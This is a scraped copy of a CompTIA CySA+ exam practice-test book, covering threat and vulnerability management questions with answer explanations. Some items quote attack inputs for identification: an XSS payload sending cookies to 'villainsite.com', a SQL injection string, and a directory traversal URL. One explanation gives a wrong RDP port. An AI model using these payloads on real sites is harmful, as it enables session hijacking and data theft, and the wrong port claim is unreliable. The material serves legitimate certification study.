0% found this document useful (0 votes)

44 views178 pages

CySA-002 Practice Test

Uploaded by

Herbert Barros

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

44 views178 pages

CySA-002 Practice Test

Uploaded by

Herbert Barros

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 178

1

{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}

2
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CompTIA CySA+ CS0-002 Practice Tests 2021®
Published by: ExamsDigest LLC., Holzmarktstraße 73, Berlin, Germany,
www.examsdigest.com Copyright © 2021 by ExamsDigest LLC.

No part of this publication may be reproduced, stored in a retrieval system or

transmitted in any form, electronic, mechanical, photocopying, recording, scan-
ning or otherwise, except as permitted under Sections 107 or 108 of the 1976
United States Copyright Act, without the prior written permission of the Pub-
lisher. Requests to the Publisher for permission should be addressed to the
Permissions Department, Examsdigest, LLC., Holzmarktstraße 73, Berlin,
Germany or online at https://www.examsdigest.com/contact.

Trademarks: Examsdigest, examsdigest.com and related trade dress are trademarks

or registered trademarks of Examsdigest LLC. and may not be used without written
permission. Amazon is a registered trademark of Amazon, Inc. All other trademarks
are the property of their respective owners. Examsdigest, LLC. is not associated with
any product or vendor mentioned in this book.

LIMIT OF LIABILITY/DISCLAIMER OF WARRANTY: THE PUBLISHER AND THE

AUTHOR MAKE NO REPRESENTATIONS OR WARRANTIES WITH RESPECT TO
THE ACCURACY OR COMPLETENESS OF THE CONTENTS OF THIS WORK AND
SPECIFICALLY DISCLAIM ALL WARRANTIES, INCLUDING WITHOUT LIMITA-
TION WARRANTIES OF FITNESS FOR A PARTICULAR PURPOSE. NO WARRAN-
TY MAY BE CREATED OR EXTENDED BY SALES OR PROMOTIONAL MATERI-
ALS. THE ADVICE AND STRATEGIES CONTAINED HEREIN MAY NOT BE SUIT-
ABLE FOR EVERY SITUATION. THIS WORK IS SOLD WITH THE UNDERSTAND-
ING THAT THE PUBLISHER IS NOT ENGAGED IN RENDERING LEGAL, AC-
COUNTING, OR OTHER PROFESSIONAL SERVICES. IF PROFESSIONAL AS-
SISTANCE IS REQUIRED, THE SERVICES OF A COMPETENT PROFESSIONAL
PERSON SHOULD BE SOUGHT. NEITHER THE PUBLISHER NOR THE AU-
THOR SHALL BE LIABLE FOR DAMAGES ARISING HEREFROM. THE FACT
THAT AN ORGANIZATION OR WEBSITE IS REFERRED TO IN THIS WORK AS A
CITATION AND/OR A POTENTIAL SOURCE OF FURTHER INFORMATION
DOES NOT MEAN THAT THE AUTHOR OR THE PUBLISHER ENDORSES THE
INFORMATION THE ORGANIZATION OR WEBSITE MAY PROVIDE OR REC-
OMMENDATIONS IT MAY MAKE.

Examsdigest publishes in a variety of print and electronic formats and by print-on-

demand. Some material included with standard print versions of this book may not
be included in e-books or in print-on-demand. If this book refers to media such as a
CD or DVD that is not included in the version you purchased, you may find this ma-
terial at https://examsdigest.com

3
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CONTENTS AT A GLANCE

Contents at a glance ........................................................................4

Introduction ........................................................................................6
Chapter 1 Threat and Vulnerability Management .....................11
Questions 1-20 ...................................................................................11
Answers 1-20 ......................................................................................24
Chapter 2 Software and Systems Security ................................53
Questions 21-35 ................................................................................53
Answers 21-35 ...................................................................................62
Chapter 3 Security Operations and Monitoring ........................83
Questions 36-50 ...............................................................................83
Answers 36-50 ..................................................................................92
Chapter 4 Incident Response ........................................................118
Questions 51-65 ................................................................................118
Answers 51-65 ...................................................................................128
Chapter 5 Compliance and Assessment ....................................151
Questions 66-75 ...............................................................................151
Answers 66-75 ..................................................................................158
THE END .............................................................................................177

4
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
5
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
INTRODUCTION
CompTIA Cybersecurity Analyst (CySA+) is an IT workforce
certification that applies behavioral analytics to networks and
devices to prevent, detect and combat cybersecurity threats
through continuous security monitoring.

About This Book

CompTIA CySA+ CS0-002 Practice Tests 2020 by Examsdi-

gest is designed to be a practical practice exam guide that will
help you prepare for the CompTIA CySA+ CS0-002 exams. As
the book title says, it includes 80+ questions, organized by
exam so that you can prepare for the final exam.

This book has been designed to help you prepare for the style
of questions you will receive on the CompTIA CySA+ CS0-002
exams. It also helps you understand the topics you can expect
to be tested on for each exam.

In order to properly prepare for the CompTIA CySA+ CS0-002, I

recommend that you:

6
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
✓ Review a reference book: CompTIA CySA+ CS0-002 by
Examsdigest is designed to give you sample questions to help
you prepare for the style of questions you will receive on the
real certification exam. However, it is not a reference book that
teaches the concepts in detail. That said, I recommend that you
review a reference book before attacking these questions so
that the theory is fresh in your mind.

✓ Get some practical, hands-on experience: After you re-

view the theory, I highly recommend getting your hands on us-
ing tools such us Kali Linux or Metasploitable. The more hands-
on experience you have, the easier the exams will be.

✓ Do practice test questions: After you review a reference

book and perform some hands-on work, attack the questions
in this book to get you “exam ready”! Also claim your free 1-
month access on our platform to dive into to more questions,
flashcards and much much more.

Beyond The Book

This book gives you plenty of CompTIA CySA+ CS0-002 ques-

tions to work on, but maybe you want to track your progress as
you tackle the questions, or maybe you’re having trouble with
certain types of questions and wish they were all presented in
7
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
one place where you could methodically make your way
through them. You’re in luck. Your book purchase comes with a
free one-month subscription to all practice questions online
and more. You get on-the-go access any way you want it —
from your computer, smartphone, or tablet. Track your progress
and view personalized reports that show where you need to
study the most. Study what, where, when, and how you want!

What you’ll find online

The online practice that comes free with this book offers you
the same questions and answers that are available here and
more.

The beauty of the online questions is that you can customize

your online practice to focus on the topic areas that give you
the most trouble.

So if you need help with the domain Network Security, then se-
lect questions related to this topic online and start practicing.

Whether you practice a few hundred problems in one sitting or

a couple dozen, and whether you focus on a few types of prob-
lems or practice every type, the online program keeps track of
the questions you get right and wrong so that you can monitor
8
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
your progress and spend time studying exactly what you need.

You can access these online tools by sending an email to the

[email protected] to claim access on our platform. Once
we confirm the purchase you can enjoy your free access.

CompTIA CySA+ CS0-002 Exam Details

The online practice that comes free with this book offers you
the same questions and answers that are available here and
more.

✓ Format - Multiple choice and performance-based

✓ Delivery Method - Testing center or online proctored exam
✓ Time - 165 minutes to complete the exam
✓ Cost - $359
✓ Language - Available in English, Japanese

9
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Exam Content

Content Outline
With the end goal of proactively defending and continuously
improving the security of an organization, CySA+ will verify the
successful candidate has the knowledge and skills required to:
• Leverage intelligence and threat detection techniques
• Analyze and interpret data
• Identify and address vulnerabilities
• Suggest preventative measures
• Effectively respond to and recover from incidents
This is equivalent to 4 years of hands-on experience in a tech-
nical cybersecurity job role.

The following topics are general guidelines for the content likely
to be included on the exam. However, other related topics may
also appear on any specific delivery of the exam. To better re-
flect the contents of the exam and for clarity purposes, the
guidelines below may change at any time without notice.

1.0: Threat and Vulnerability Management (22%)

2.0: Software and Systems Security (18%)
3.0: Security Operations and Monitoring (25%)
4.0: Incident Response (22%)
5.0: Compliance and Assessment (13%)

10
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
CHAPTER 1
THREAT AND VULNERABILITY
MANAGEMENT

Questions 1-20

11
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 1. In the cybersecurity and threat intelligence indus-
tries, there are several approaches used to analyze and track
the characteristics of cyber intrusions by advanced threat ac-
tors. Which of the following approaches emphasizes the rela-
tionships and characteristics of four basic components: the ad-
versary, capabilities, infrastructure, and victims?
(A) Attack vector
(B) MITRE ATT&CK
(C) The Diamond Model of Intrusion Analysis
(D) Kill chain

Question 2. Which of the following tools are infrastructure vul-

nerability scanners? (Choose all that apply)
(A) Nessus
(B) OpenVAS
(C) Qualys
(D) Prowler
(E) Burp suite

12
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 3. You open the command prompt and type the fol-
lowing command to find out which ports on your system are
open. lsof -Pn -i4 | grep LISTEN After typing the command
you receive the following results.

127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)

Which of the following services are not currently running on

your system? (Choose all that apply)
(A) FTP
(B) SSH
(C) DHCP
(D) SMTP
(E) RDP

Question 4. A malicious user exploited a bug in a system and

gained elevated access to resources that should normally be
unavailable to him. Which type of attack was conducted in that
system?
(A) Access escalation
(B) Elevated access
(C) Privilege escalation
(D) Elevated Privilege

13
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 5. In which of the following types of attacks the
unauthorized user gains access to a system or network and
remains there for an extended period of time without being de-
tected with the main goal to steal data instead of causing dam-
age to the network or system?
(A) Zero-day
(B) Advanced persistent threat
(C) Fuzzing
(D) Nikto

Question 6. Which of the following threat actor terms is the act

of breaking into a computer system, for politically or socially
motivated purposes?
(A) Insider threat
(B) Nation-state
(C) Hacktivist
(D) Zero-day

14
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 7. Active Vulnerability Scanners identify the active
operating systems, applications, and ports throughout a net-
work and provide information about weaknesses but they can’t
take any action to resolve security problems. (True/False)
(A) TRUE
(B) FALSE

Question 8. You have been hired as a security analyst to con-

duct a source code analysis on different websites. After spend-
ing hours to find out if the sites are compromised or not, you
notice the following code snippet:

http://www.client-website.com/search? <script> loca-

tion.href='http://www.villainsite.com/hijacker.php?
cookie='+document.cookie; </script >

Which of the following attacks the attacker is trying to conduct

on your client’s website?
(A) Rootkit
(B) Cross-site scripting
(C) Impersonation
(D) SQL injection

15
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 9. The developer of your company wrote the follow-
ing code snippet in Java to show the account numbers and
balances for the current user’s id as provided in a URL.

String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts
WHERE account_owner_id =
“+request.getParameter("user_id");
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBal-
anceQuery);
while (rs.next()) { page.addTableRow(rs.getInt("ac-
countNumber"), rs.getFloat("balance"));
}

Under normal operation, the user with ID 4 might be logged in,

and visit the URL: https://mybank.ebanking/show_balances?
user_id=4. This means that accountBalanceQuery would end
up being: SELECT accountNumber, balance FROM ac-
counts WHERE account_owner_id = 4

A cyber security criminal changed the parameter “user_id” to

be interpreted as: 0 OR 1=1

When this query is passed to the database, it returned all the

16
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
account numbers and balances it has stored, and rows are
added to the page to show them. The attacker now knows
every user’s account numbers and balances. Which of the fol-
lowing type of attacks is conducted against the website?
(A) Extensible markup language (XML) attack
(B) Overflow attack
(C) Credential stuffing
(D) Structured query language (SQL) injection

Question 10. Which of the following monitoring solutions

should you implement that provides the most accurate and up-
dated information about any vulnerabilities present in a given
system?
(A) Agent-based
(B) Server-based
(C) External
(D) Internal

17
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 11. You just completed an HPING scan and received
the following output:

HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 head-

ers + 0 data bytes
len=46 ip=4.2.2.1 ttl=56 DF id=32839 sport=50
flags=RA seq=0 win=0 rtt=264.3 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32840 sport=51
flags=RA seq=1 win=0 rtt=277.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32841 sport=52
flags=RA seq=2 win=0 rtt=285.4 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32842 sport=53
flags=SA seq=3 win=49312 rtt=270.7 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32843 sport=54
flags=RA seq=4 win=0 rtt=225.1 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32844 sport=55
flags=RA seq=5 win=0 rtt=202.6 ms
len=46 ip=4.2.2.1 ttl=56 DF id=32845 sport=56
flags=RA seq=6 win=0 rtt=196.7 ms

Based on these results, which of the following services re-

turned an SYN-ACK?
(A) DHCP
(B) DNS
(C) SMTP
(D) IMAP

18
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 12. The Internet of things (IoT) is a network of physi-
cal objects that are embedded with sensors, software, and oth-
er technologies for the purpose of connecting and exchanging
data with other devices and systems over the Internet. Which
of the following statements is NOT considered an IoT threat and
vulnerability.
(A) Insecure network services
(B) Lack of secure update mechanism
(C) Lack of physical hardening
(D) Unoptimized software code

Question 13. A telecom company may promise network avail-

ability of 99.999 percent and allow the customer to reduce
their payment by a given percentage if that is not achieved.
Which of the following agreements is described in this exam-
ple?
(A) Memorandum of understanding
(B) Service-level agreement
(C) Organizational governance
(D) Business process interruption

19
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 14. The developer of your company is writing soft-
ware in C language. As he is a junior software engineer he
needs your help to choose secure functions for his projects.
Which of the following functions he shouldn’t use as it is con-
sidered an insecure function?
(A) strcpy()
(B) strncpy()
(C) strlen()
(D) strlwr()

Question 15. While you were interpreting Assessment Reports

on Acunetix Vulnerability Scanner you identified a vulnerability
in the system with a Common Vulnerability Scoring System
(CVSS) value of (L) and a score (0.395). Based on the given
scenario, which of the following statements would be true?
(A) There is no impact on the availability of the system
(B) The attacker must either have physical access to the
vulnerable system or a local account
(C) The attacker must authenticate once in order to exploit
the vulnerability
(D) There is no impact on the confidentiality of the system

20
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 16. In your company you are using a Web Vulnerabil-
ity Scanner tool named Acunetic to check whether your web-
site and web applications are vulnerable. While you were re-
viewing a scan report you saw the following URL:

http://test.webarticles.com/show.asp?view=../../../../../
Windows/system.ini HTTP/1.1

What type of attack is conducted on that website?

(A) Password spraying
(B) Directory traversal
(C) Privilege escalation
(D) On-path attack

Question 17. An organization has hired a cybersecurity analyst

to conduct an assessment of its current wireless network secu-
rity. He has been tasked to capture the inbound and outbound
packets and export the data to text files for further processing
by third-party tools. Which of the following tools the analyst
should use to complete the task?
(A) ScoutSuite
(B) Pacu
(C) Prowler
(D) Aircrack-ng
21
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 18. You have been hired as a cybersecurity analyst to
conduct an assessment against the organization’s network.
Now you are in the process of trying to discover as many attack
vectors as possible that can be used to exploit the systems fur-
ther. Which of the following is the phase you are currently in?
(A) Static analysis
(B) Reverse engineering
(C) Enumaration
(D) Dynamic analysis

Question 19. Your company has moved any workload from its
on-premises environment to Amazon Web Services (AWS) to
benefit from substantial IT costs savings, business agility, and
operational resilience. You have been tasked to recommend a
tool that enables security posture assessment of cloud envi-
ronments. Which of the following tools should you recommend
to complete the task?
(A) Scout Suite
(B) Aircrack-ng
(C) oclHashcat
(D) Reaver

22
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 20. You are working on an application with multiple
serverless functions and your task is to deploy a REST API us-
ing Serverless, Express, and Node.js. Which of the following
actions should you perform to ensure that a vulnerability in one
function doesn’t escalate and compromise others as well?
(A) Maintain isolated function perimeters
(B) Employ API gateways as a security buffer
(C) Secure and verify data in transit
(D) Patch function dependencies

23
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Answers 1-20

Question 1. In the cybersecurity and threat intelligence indus-

tries, there are several approaches used to analyze and track
the characteristics of cyber intrusions by advanced threat ac-
tors. Which of the following approaches emphasizes the rela-
tionships and characteristics of four basic components: the ad-
versary, capabilities, infrastructure, and victims?
(A) Attack vector
(B) MITRE ATT&CK
(C) The Diamond Model of Intrusion Analysis
(D) Kill chain

Explanation 1. The Diamond Model of Intrusion Analysis is

the correct answer. In the cybersecurity and threat intelli-
gence industries, there are several approaches used to analyze
and track the characteristics of cyber intrusions by advanced
threat actors. One popular approach is the Diamond Model
of Intrusion Analysis.

This model emphasizes the relationships and characteristics of

four basic components: the adversary, capabilities, in-
frastructure, and victims. The main axiom of this model states,

“For every intrusion event, there exists an adversary taking a

step toward an intended goal by using a capability over in-
24
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
frastructure against a victim to produce a result.” This means
that an intrusion event is defined as how the attacker demon-
strates and uses certain capabilities and techniques over in-
frastructure against a target.

Attack vector is incorrect. In cyber security, an attack vector

is a method or pathway used by a hacker to access or pene-
trate the target system. Hackers steal information, data and
money from people and organizations by investigating known
attack vectors and attempting to exploit vulnerabilities to gain
access to the desired system.

25
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
MITRE ATT&CK is incorrect. The MITRE ATT&CK framework is
a comprehensive matrix of tactics and techniques used by
threat hunters, red teamers, and defenders to better classify at-
tacks and assess an organization’s risk.

The aim of the framework is to improve post-compromise de-

tection of adversaries in enterprises by illustrating the actions
an attacker may have taken.

Kill chain is incorrect. The cyber kill chain is a series of steps

that trace stages of a cyberattack from the early reconnais-
sance stages to the exfiltration of data. The kill chain helps us
understand and combat ransomware, security breaches, and
advanced persistent attacks (APTs).

Question 2. Which of the following tools are infrastructure vul-

nerability scanners? (Choose all that apply)
(A) Nessus
(B) OpenVAS
(C) Qualys
(D) Prowler
(E) Burp suite

26
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 2. Nessus, OpenVAS and Qualys are the cor-
rect answers. Vulnerability scanners are automated tools that
allow organizations to check if their networks, systems and ap-
plications have security weaknesses that could expose them to
attacks.

Prowler is incorrect because this is a cloud infrastructure as-

sessment tool.

Burp suite is incorrect because this is web application scan-

ner.

27
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 3. You open the command prompt and type the fol-
lowing command to find out which ports on your system are
open.

lsof -Pn -i4 | grep LISTEN

After typing the command you receive the following results.

127.0.0.1:22 (LISTEN)
127.0.0.1:53 (LISTEN)
127.0.0.1:68 (LISTEN)
127.0.0.1:25 (LISTEN)

Which of the following services are not currently running on

your system? (Choose all that apply)
(A) FTP
(B) SSH
(C) DHCP
(D) SMTP
(E) RDP

Explanation 3. FTP and RDP are the correct answers. FTP

uses port 21 for its service and the RDP uses port 3839. Ac-
cording to the results you receive from the command lsof -Pn -
i4 | grep LISTEN your workstation uses the following services:
- SSH port 22
- DNS port 53
- DHCP port 68
- SMTP port 25

28
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 4. A malicious user exploited a bug in a system and
gained elevated access to resources that should normally be
unavailable to him. Which type of attack was conducted in that
system?
(A) Access escalation
(B) Elevated access
(C) Privilege escalation
(D) Elevated Privilege

Explanation 4. Privilege escalation is the correct

answer. Privilege escalation happens when a malicious user
exploits a bug, design flaw, or configuration error in an applica-
tion or operating system to gain elevated access to resources
that should normally be unavailable to that user. The attacker
can then use the newly gained privileges to steal confidential
data, run administrative commands, or deploy malware.

29
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 5. In which of the following types of attacks the
unauthorized user gains access to a system or network and
remains there for an extended period of time without being de-
tected with the main goal to steal data instead of causing dam-
age to the network or system?
(A) Zero-day
(B) Advanced persistent threat
(C) Fuzzing
(D) Nikto

Explanation 5. Advanced persistent threat is the correct

answer. An advanced persistent threat is an attack in which an
unauthorized user gains access to a system or network and
remains there for an extended period of time without being de-
tected. Advanced persistent threats are particularly dangerous
for enterprises, as hackers have ongoing access to sensitive
company data. Advanced persistent threats generally do not
cause damage to company networks or local machines. In-
stead, the goal of advanced persistent threats is most often
data theft.

Zero-day is incorrect. A zero-day exploit is a cyber attack that

occurs on the same day a weakness is discovered in software.

30
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
At that point, it’s exploited before a fix becomes available from
its creator.

Fuzzing is incorrect because it is a software assessment tool.

Nikto is incorrect because it is a web application scanner.

Question 6. Which of the following threat actor terms is the act

of breaking into a computer system, for politically or socially
motivated purposes?
(A) Insider threat
(B) Nation-state
(C) Hacktivist
(D) Zero-day

Explanation 6. Hacktivist is the correct answer. Derived

from combining the words ‘Hack’ and ‘Activism’, hacktivism is
the act of hacking, or breaking into a computer system, for po-
litically or socially motivated purposes.

Insider threat is incorrect. An insider threat is a malicious

threat to an organization that comes from people within the or-
ganization, such as employees, former employees, contractors
or business associates, who have inside information concern-

31
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
ing the organization’s security practices, data and computer
systems.

Nation-state is incorrect. Nation-state hackers target gov-

ernment agencies, critical infrastructure, and any and all indus-
tries known to contain sensitive data or property. Typically, they
strike via sophisticated techniques that interrupt business op-
erations, leak confidential information, and generate massive
data and revenue loss.

Zero-day is incorrect. A zero-day exploit is a cyber attack that

occurs on the same day a weakness is discovered in software.
At that point, it’s exploited before a fix becomes available from
its creator. Initially, when a user discovers that there is a securi-
ty risk in a program, they can report it to the software company,
which will then develop a security patch to fix the flaw.

Question 7. Active Vulnerability Scanners identify the active

operating systems, applications, and ports throughout a net-
work and provide information about weaknesses but they can’t
take any action to resolve security problems. (True/False)
(A) TRUE
(B) FALSE

32
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 7. FALSE is the correct answer. Passive Vulner-
ability Scanners identify the active operating systems, ap-
plications, and ports throughout a network and provide infor-
mation about weaknesses but they can’t take any action to re-
solve security problems.

Active scanners send transmissions to the network’s nodes,

examining the responses they receive to evaluate whether a
specific node represents a weak point within the network. Ac-
tive scanners can take action to autonomously resolve security
issues, such as blocking a potentially dangerous IP address.

33
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 8. You have been hired as a security analyst to con-
duct a source code analysis on different websites. After spend-
ing hours to find out if the sites are compromised or not, you
notice the following code snippet:

http://www.client-website.com/search? <script> loca-

tion.href='http://www.villainsite.com/hijacker.php?
cookie='+document.cookie; </script >

Which of the following attacks the attacker is trying to conduct

on your client’s website?
(A) Rootkit
(B) Cross-site scripting
(C) Impersonation
(D) SQL injection

Explanation 8. Cross-site scripting is the correct

answer. This is probably the most dangerous and widespread
method of web session hijacking. By exploiting server or appli-
cation vulnerabilities, attackers can inject client-side scripts
into web pages, causing your browser to execute arbitrary code
when it loads a compromised page.

For example, attackers may distribute emails or IM messages

with a specially crafted link pointing to a known and trusted
website but containing HTTP query parameters that exploit a

34
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
known vulnerability to inject script code. For an XSS attack
used for session hijacking, the code might send the session
key to the attacker’s own website, for instance:

http://www.website.com/search?<script>
location.href='http://www.VillainSite.com/hijacker.php?
cookie='+document.cookie; </script>

The above script would read the current session cookie

using document.cookie and send it to the attacker’s website
by setting the location URL in the browser using location.href.

35
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Rootkit is incorrect. Rootkit is a term applied to a type of mal-
ware that is designed to infect a target PC and allow an attacker
to install a set of tools that grant him persistent remote access
to the computer.

Impersonation is incorrect. An impersonation attack is a form

of fraud in which attackers pose as a known or trusted person
to dupe an employee into transferring money to a fraudulent
account, sharing sensitive information (such as intellectual
property, financial data or payroll information), or revealing login
credentials that attackers can used to hack into a company’s
computer network.

SQL injection is incorrect. SQL injection is a web security vul-

nerability that allows an attacker to interfere with the queries
that an application makes to its database. It generally allows an
attacker to view data that they are not normally able to retrieve.

36
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 9. The developer of your company wrote the follow-
ing code snippet in Java to show the account numbers and
balances for the current user’s id as provided in a URL.
String accountBalanceQuery =
"SELECT accountNumber, balance FROM accounts
WHERE account_owner_id =
“+request.getParameter("user_id");
Statement statement = connection.createStatement();
ResultSet rs = statement.executeQuery(accountBal-
anceQuery);
while (rs.next()) { page.addTableRow(rs.getInt("ac-
countNumber"), rs.getFloat("balance"));}

Under normal operation, the user with ID 4 might be logged in,

A cyber security criminal changed the parameter “user_id” to

be interpreted as: 0 OR 1=1
When this query is passed to the database, it returned all the
account numbers and balances it has stored, and rows are
added to the page to show them. The attacker now knows
every user’s account numbers and balances. Which of the fol-

37
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
lowing type of attacks is conducted against the website?
(A) Extensible markup language (XML) attack
(B) Overflow attack
(C) Credential stuffing
(D) Structured query language (SQL) injection

Explanation 9. Structured query language (SQL) injection

is the correct answer. SQL Injection (SQLi) is a type of injec-
tion attack that makes it possible to execute malicious SQL
statements. These statements control a database server be-
hind a web application. Attackers can use SQL Injection vulner-
abilities to bypass application security measures. They can go
around authentication and authorization of a web page or web
application and retrieve the content of the entire SQL database.
They can also use SQL Injection to add, modify, and delete
records in the database.

Extensible markup language (XML) attack is incorrect. XML

external entity injection (also known as XXE) is a web security
vulnerability that allows an attacker to interfere with an applica-
tion’s processing of XML data. It often allows an attacker to
view files on the application server filesystem, and to interact
with any back-end or external systems that the application it-
self can access.

38
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Overflow attack is incorrect. Attackers exploit buffer overflow
issues by overwriting the memory of an application. This
changes the execution path of the program, triggering a re-
sponse that damages files or exposes private information. For
example, an attacker may introduce extra code, sending new
instructions to the application to gain access to IT systems.

Credential stuffing is incorrect. Credential stuffing is a cy-

berattack method in which attackers use lists of compromised
user credentials to breach into a system. The attack uses bots
for automation and scale and is based on the assumption that
many users reuse usernames and passwords across multiple
services. Statistics show that about 0.1% of breached creden-
tials attempted on another service will result in a successful lo-
gin.

Question 10. Which of the following monitoring solutions

should you implement that provides the most accurate and up-
dated information about any vulnerabilities present in a given
system?
(A) Agent-based
(B) Server-based
(C) External
(D) Internal
39
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Explanation 10. Agent-based is the correct answer. Agent-
based Monitoring allows you to collect, analyze, and process
significantly more data from a given system. This is usually a
given, considering that software and hardware vendors provide
agents that are specifically designed for their respective plat-
forms and have programmed the agent to interface with it
specifically.

Question 11. You just completed an HPING scan and received

the following output:

HPING 4.2.2.1 (eth1 4.2.2.1): S set, 40 head-

40
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Based on these results, which of the following services re-
turned an SYN-ACK?
(A) DHCP
(B) DNS
(C) SMTP
(D) IMAP

Explanation 11. DNS is the correct answer. From the output

above we can see that the majority of probes returned RST
packets indicating that all of these ports are closed. The only
probe directed at port 53 returned SYN-ACK thus suggesting
an open port.

DNS uses Port 53 which is nearly always open on systems,

firewalls, and clients to transmit DNS queries.

41
{JOIN US: https://t.me/bookzillaaa - https://t.me/ThDrksdHckr}
Question 12. The Internet of things (IoT) is a network of physi-
cal objects that are embedded with sensors, software, and oth-
er technologies for the purpose of connecting and exchanging
data with other devices and systems over the Internet. Which
of the following statements is NOT considered an IoT threat and
vulnerability.
(A) Insecure network services
(B) Lack of secure update mechanism
(C) Lack of physical hardening
(D) Unoptimized software code

Explanation 12. Unoptimized software code is the correct

answer.

The vulnerabilities identified by OWASP’s are:

1. WEAK, GUESSABLE, AND HARDCODED PASSWORDS
2. INSECURE NETWORK SERVICES
3. INSECURE ECOSYSTEM INTERFACES
4. LACK OF SECURE UPDATE MECHANISM
5. USE OF INSECURE OR OUTDATED COMPONENTS
6. INSUFFICIENT PRIVACY PROTECTION
7. INSECURE DATA TRANSFER AND STORAGE
8. LACK OF DEVICE MANAGEMENT
